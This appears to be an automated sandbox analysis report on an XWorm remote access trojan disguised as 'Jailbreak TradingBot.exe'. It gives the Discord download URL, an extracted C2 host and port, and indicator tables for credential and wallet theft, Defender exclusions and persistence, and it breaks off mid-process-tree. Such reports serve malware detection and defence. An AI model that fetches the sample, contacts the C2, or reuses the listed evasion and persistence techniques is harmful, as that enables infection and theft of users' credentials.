xworm | hxxps://cdn[.]discordapp[.]com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot[.]exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&

Analysis

max time kernel
104s
max time network
107s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
23/08/2024, 23:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&

Score

10^/10

xworm collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

pressure-pl.gl.at.ply.gg:16289:16289

pressure-pl.gl.at.ply.gg:16289

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023478-92.dat	family_xworm
behavioral1/memory/5504-99-0x00000000005B0000-0x00000000005C8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5552	powershell.exe
5404	powershell.exe
5884	powershell.exe
5380	powershell.exe
600	powershell.exe
600	powershell.exe
6092	powershell.exe
4228	powershell.exe
4372	powershell.exe
4848	powershell.exe
4040	powershell.exe
1596	powershell.exe
5188	powershell.exe
4980	powershell.exe
2168	powershell.exe
3768	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Opperhoofd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Jailbreak TradingBot.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Jailbreak TradingBot.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Jailbreak TradingBot.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Jailbreak TradingBot.exe

Clipboard Data 1 TTPs 6 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5216	cmd.exe
5608	powershell.exe
3968	cmd.exe
220	powershell.exe
1684	cmd.exe
5284	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Opperhoofd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Opperhoofd.exe

Executes dropped EXE 22 IoCs

pid	Process
5320	Jailbreak TradingBot.exe
5260	Jailbreak TradingBot.exe
5504	Opperhoofd.exe
5588	Built.exe
5708	Built.exe
5844	Jailbreak TradingBot.exe
5936	Opperhoofd.exe
6024	Built.exe
5244	Built.exe
5884	rar.exe
5156	XClient.exe
5700	Jailbreak TradingBot.exe
5704	Opperhoofd.exe
5680	Built.exe
5304	Built.exe
1884	rar.exe
372	Jailbreak TradingBot.exe
5652	Opperhoofd.exe
5512	Built.exe
1876	Built.exe
5156	rar.exe
2260	XClient.exe

Loads dropped DLL 64 IoCs

pid	Process
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5708	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5244	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
5304	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe
1876	Built.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002348a-137.dat	upx
behavioral1/memory/5708-140-0x00007FFA0A4D0000-0x00007FFA0AAB9000-memory.dmp	upx
behavioral1/files/0x000700000002347d-143.dat	upx
behavioral1/memory/5708-163-0x00007FFA1FF00000-0x00007FFA1FF0F000-memory.dmp	upx
behavioral1/memory/5708-162-0x00007FFA0E210000-0x00007FFA0E234000-memory.dmp	upx
behavioral1/files/0x0007000000023484-161.dat	upx
behavioral1/files/0x0007000000023483-160.dat	upx
behavioral1/files/0x0007000000023482-159.dat	upx
behavioral1/files/0x0007000000023481-158.dat	upx
behavioral1/files/0x0007000000023480-157.dat	upx
behavioral1/files/0x000700000002347f-156.dat	upx
behavioral1/files/0x000700000002347e-155.dat	upx
behavioral1/files/0x000700000002347c-154.dat	upx
behavioral1/files/0x000700000002348f-153.dat	upx
behavioral1/files/0x000700000002348e-152.dat	upx
behavioral1/files/0x000700000002348d-151.dat	upx
behavioral1/files/0x0007000000023489-148.dat	upx
behavioral1/files/0x0007000000023487-147.dat	upx
behavioral1/files/0x0007000000023488-145.dat	upx
behavioral1/memory/5708-174-0x00007FFA0DDC0000-0x00007FFA0DDE3000-memory.dmp	upx
behavioral1/memory/5708-172-0x00007FFA0EC00000-0x00007FFA0EC19000-memory.dmp	upx
behavioral1/memory/5708-171-0x00007FFA0DEB0000-0x00007FFA0DEDD000-memory.dmp	upx
behavioral1/memory/5708-177-0x00007FFA0CCA0000-0x00007FFA0CE10000-memory.dmp	upx
behavioral1/memory/5708-183-0x00007FFA0D090000-0x00007FFA0D0BE000-memory.dmp	upx
behavioral1/memory/5708-182-0x00007FFA1D6A0000-0x00007FFA1D6AD000-memory.dmp	upx
behavioral1/memory/5708-179-0x00007FFA0E2B0000-0x00007FFA0E2C9000-memory.dmp	upx
behavioral1/memory/5708-188-0x00007FFA0C920000-0x00007FFA0CC95000-memory.dmp	upx
behavioral1/memory/5708-187-0x00007FFA09850000-0x00007FFA09908000-memory.dmp	upx
behavioral1/memory/5708-186-0x00007FFA0A4D0000-0x00007FFA0AAB9000-memory.dmp	upx
behavioral1/memory/5708-206-0x00007FFA095C0000-0x00007FFA096DC000-memory.dmp	upx
behavioral1/memory/5708-198-0x00007FFA1A150000-0x00007FFA1A15D000-memory.dmp	upx
behavioral1/memory/5708-197-0x00007FFA0DE90000-0x00007FFA0DEA4000-memory.dmp	upx
behavioral1/memory/5708-196-0x00007FFA0E210000-0x00007FFA0E234000-memory.dmp	upx
behavioral1/memory/5244-220-0x00007FFA05450000-0x00007FFA05A39000-memory.dmp	upx
behavioral1/memory/5708-221-0x00007FFA0DDC0000-0x00007FFA0DDE3000-memory.dmp	upx
behavioral1/memory/5708-224-0x00007FFA0CCA0000-0x00007FFA0CE10000-memory.dmp	upx
behavioral1/memory/5244-223-0x00007FFA165F0000-0x00007FFA165FF000-memory.dmp	upx
behavioral1/memory/5244-222-0x00007FFA0D010000-0x00007FFA0D034000-memory.dmp	upx
behavioral1/memory/5708-260-0x00007FFA0D090000-0x00007FFA0D0BE000-memory.dmp	upx
behavioral1/memory/5244-259-0x00007FFA0A4B0000-0x00007FFA0A4C9000-memory.dmp	upx
behavioral1/memory/5244-258-0x00007FFA08E30000-0x00007FFA08E5D000-memory.dmp	upx
behavioral1/memory/5244-264-0x00007FFA03270000-0x00007FFA033E0000-memory.dmp	upx
behavioral1/memory/5244-263-0x00007FFA08A70000-0x00007FFA08A93000-memory.dmp	upx
behavioral1/memory/5244-268-0x00007FFA08A40000-0x00007FFA08A6E000-memory.dmp	upx
behavioral1/memory/5708-267-0x00007FFA095C0000-0x00007FFA096DC000-memory.dmp	upx
behavioral1/memory/5244-269-0x00007FFA05450000-0x00007FFA05A39000-memory.dmp	upx
behavioral1/memory/5244-272-0x00007FFA0D010000-0x00007FFA0D034000-memory.dmp	upx
behavioral1/memory/5244-287-0x00007FFA01940000-0x00007FFA01CB5000-memory.dmp	upx
behavioral1/memory/5244-291-0x00007FFA0A4B0000-0x00007FFA0A4C9000-memory.dmp	upx
behavioral1/memory/5244-290-0x00007FFA09090000-0x00007FFA0909D000-memory.dmp	upx
behavioral1/memory/5244-289-0x00007FFA0C8A0000-0x00007FFA0C8B4000-memory.dmp	upx
behavioral1/memory/5244-288-0x00007FFA029C0000-0x00007FFA02A78000-memory.dmp	upx
behavioral1/memory/5244-285-0x00007FFA0DDB0000-0x00007FFA0DDBD000-memory.dmp	upx
behavioral1/memory/5244-284-0x00007FFA08D50000-0x00007FFA08D69000-memory.dmp	upx
behavioral1/memory/5244-283-0x00007FFA03270000-0x00007FFA033E0000-memory.dmp	upx
behavioral1/memory/5244-282-0x00007FFA08A70000-0x00007FFA08A93000-memory.dmp	upx
behavioral1/memory/5244-280-0x00007FFA08E30000-0x00007FFA08E5D000-memory.dmp	upx
behavioral1/memory/5244-279-0x00007FFA165F0000-0x00007FFA165FF000-memory.dmp	upx
behavioral1/memory/5244-277-0x00007FFA05450000-0x00007FFA05A39000-memory.dmp	upx
behavioral1/memory/5244-286-0x00007FFA08A40000-0x00007FFA08A6E000-memory.dmp	upx
behavioral1/memory/5244-278-0x00007FFA0D010000-0x00007FFA0D034000-memory.dmp	upx
behavioral1/memory/5244-274-0x00007FFA09090000-0x00007FFA0909D000-memory.dmp	upx
behavioral1/memory/5244-273-0x00007FFA0C8A0000-0x00007FFA0C8B4000-memory.dmp	upx
behavioral1/memory/5244-271-0x00007FFA029C0000-0x00007FFA02A78000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	Opperhoofd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
103	discord.com
104	discord.com
71	discord.com
72	discord.com
85	discord.com
86	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	ip-api.com
68	ip-api.com
83	ip-api.com
101	ip-api.com

Enumerates processes with tasklist 1 TTPs 15 IoCs

discovery

Process Discovery

T1057

pid	Process
5588	tasklist.exe
4320	tasklist.exe
5792	tasklist.exe
5996	tasklist.exe
2720	tasklist.exe
5324	tasklist.exe
6120	tasklist.exe
5488	tasklist.exe
1472	tasklist.exe
6024	tasklist.exe
5852	tasklist.exe
2660	tasklist.exe
5652	tasklist.exe
5044	tasklist.exe
768	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5252	cmd.exe
3664	cmd.exe
3632	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3936	cmd.exe
3892	PING.EXE
5288	cmd.exe
3860	PING.EXE
5264	cmd.exe
2780	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5556	cmd.exe
6068	netsh.exe
3312	cmd.exe
5700	netsh.exe
1288	cmd.exe
3992	netsh.exe

Detects videocard installed 1 TTPs 9 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3860	WMIC.exe
1748	WMIC.exe
5596	WMIC.exe
4828	WMIC.exe
1700	WMIC.exe
5736	WMIC.exe
3688	WMIC.exe
5608	WMIC.exe
5676	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6140	systeminfo.exe
5372	systeminfo.exe
5872	systeminfo.exe

Kills process with taskkill 20 IoCs

evasion

pid	Process
6136	taskkill.exe
5228	taskkill.exe
5768	taskkill.exe
5764	taskkill.exe
5820	taskkill.exe
5704	taskkill.exe
5556	taskkill.exe
5560	taskkill.exe
5244	taskkill.exe
5208	taskkill.exe
1344	taskkill.exe
6120	taskkill.exe
6040	taskkill.exe
5456	taskkill.exe
5668	taskkill.exe
5448	taskkill.exe
5872	taskkill.exe
3276	taskkill.exe
5160	taskkill.exe
6108	taskkill.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 346191.crdownload:SmartScreen	msedge.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
3860	PING.EXE
2780	PING.EXE
3892	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5604	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5504	Opperhoofd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4640	msedge.exe
4640	msedge.exe
3604	msedge.exe
3604	msedge.exe
2080	identity_helper.exe
2080	identity_helper.exe
5152	msedge.exe
5152	msedge.exe
600	powershell.exe
600	powershell.exe
600	powershell.exe
1596	powershell.exe
1596	powershell.exe
1596	powershell.exe
6092	powershell.exe
6092	powershell.exe
6092	powershell.exe
5552	powershell.exe
5552	powershell.exe
5552	powershell.exe
5404	powershell.exe
5404	powershell.exe
5404	powershell.exe
5608	powershell.exe
5608	powershell.exe
5608	powershell.exe
5884	powershell.exe
5884	powershell.exe
5884	powershell.exe
5188	powershell.exe
5188	powershell.exe
5188	powershell.exe
5580	powershell.exe
5580	powershell.exe
5580	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
2592	powershell.exe
2592	powershell.exe
2592	powershell.exe
4372	powershell.exe
4372	powershell.exe
5380	powershell.exe
5380	powershell.exe
5380	powershell.exe
4372	powershell.exe
220	powershell.exe
220	powershell.exe
220	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
5704	powershell.exe
5704	powershell.exe
5704	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
600	powershell.exe
600	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5504	Opperhoofd.exe
Token: SeDebugPrivilege	5936	Opperhoofd.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeIncreaseQuotaPrivilege	5408	WMIC.exe
Token: SeSecurityPrivilege	5408	WMIC.exe
Token: SeTakeOwnershipPrivilege	5408	WMIC.exe
Token: SeLoadDriverPrivilege	5408	WMIC.exe
Token: SeSystemProfilePrivilege	5408	WMIC.exe
Token: SeSystemtimePrivilege	5408	WMIC.exe
Token: SeProfSingleProcessPrivilege	5408	WMIC.exe
Token: SeIncBasePriorityPrivilege	5408	WMIC.exe
Token: SeCreatePagefilePrivilege	5408	WMIC.exe
Token: SeBackupPrivilege	5408	WMIC.exe
Token: SeRestorePrivilege	5408	WMIC.exe
Token: SeShutdownPrivilege	5408	WMIC.exe
Token: SeDebugPrivilege	5408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5408	WMIC.exe
Token: SeRemoteShutdownPrivilege	5408	WMIC.exe
Token: SeUndockPrivilege	5408	WMIC.exe
Token: SeManageVolumePrivilege	5408	WMIC.exe
Token: 33	5408	WMIC.exe
Token: 34	5408	WMIC.exe
Token: 35	5408	WMIC.exe
Token: 36	5408	WMIC.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	5652	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5408	WMIC.exe
Token: SeSecurityPrivilege	5408	WMIC.exe
Token: SeTakeOwnershipPrivilege	5408	WMIC.exe
Token: SeLoadDriverPrivilege	5408	WMIC.exe
Token: SeSystemProfilePrivilege	5408	WMIC.exe
Token: SeSystemtimePrivilege	5408	WMIC.exe
Token: SeProfSingleProcessPrivilege	5408	WMIC.exe
Token: SeIncBasePriorityPrivilege	5408	WMIC.exe
Token: SeCreatePagefilePrivilege	5408	WMIC.exe
Token: SeBackupPrivilege	5408	WMIC.exe
Token: SeRestorePrivilege	5408	WMIC.exe
Token: SeShutdownPrivilege	5408	WMIC.exe
Token: SeDebugPrivilege	5408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5408	WMIC.exe
Token: SeRemoteShutdownPrivilege	5408	WMIC.exe
Token: SeUndockPrivilege	5408	WMIC.exe
Token: SeManageVolumePrivilege	5408	WMIC.exe
Token: 33	5408	WMIC.exe
Token: 34	5408	WMIC.exe
Token: 35	5408	WMIC.exe
Token: 36	5408	WMIC.exe
Token: SeDebugPrivilege	6092	powershell.exe
Token: SeIncreaseQuotaPrivilege	5596	WMIC.exe
Token: SeSecurityPrivilege	5596	WMIC.exe
Token: SeTakeOwnershipPrivilege	5596	WMIC.exe
Token: SeLoadDriverPrivilege	5596	WMIC.exe
Token: SeSystemProfilePrivilege	5596	WMIC.exe
Token: SeSystemtimePrivilege	5596	WMIC.exe
Token: SeProfSingleProcessPrivilege	5596	WMIC.exe
Token: SeIncBasePriorityPrivilege	5596	WMIC.exe
Token: SeCreatePagefilePrivilege	5596	WMIC.exe
Token: SeBackupPrivilege	5596	WMIC.exe
Token: SeRestorePrivilege	5596	WMIC.exe
Token: SeShutdownPrivilege	5596	WMIC.exe
Token: SeDebugPrivilege	5596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5596	WMIC.exe
Token: SeRemoteShutdownPrivilege	5596	WMIC.exe
Token: SeUndockPrivilege	5596	WMIC.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe
3604	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3604 wrote to memory of 416	3604	msedge.exe	84
PID 3604 wrote to memory of 416	3604	msedge.exe	84
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4388	3604	msedge.exe	85
PID 3604 wrote to memory of 4640	3604	msedge.exe	86
PID 3604 wrote to memory of 4640	3604	msedge.exe	86
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87
PID 3604 wrote to memory of 1684	3604	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 9 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1932	attrib.exe
768	attrib.exe
5936	attrib.exe
5668	attrib.exe
5500	attrib.exe
1536	attrib.exe
2716	attrib.exe
5948	attrib.exe
5296	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1f8346f8,0x7ffa1f834708,0x7ffa1f834718
  2⤵
  PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
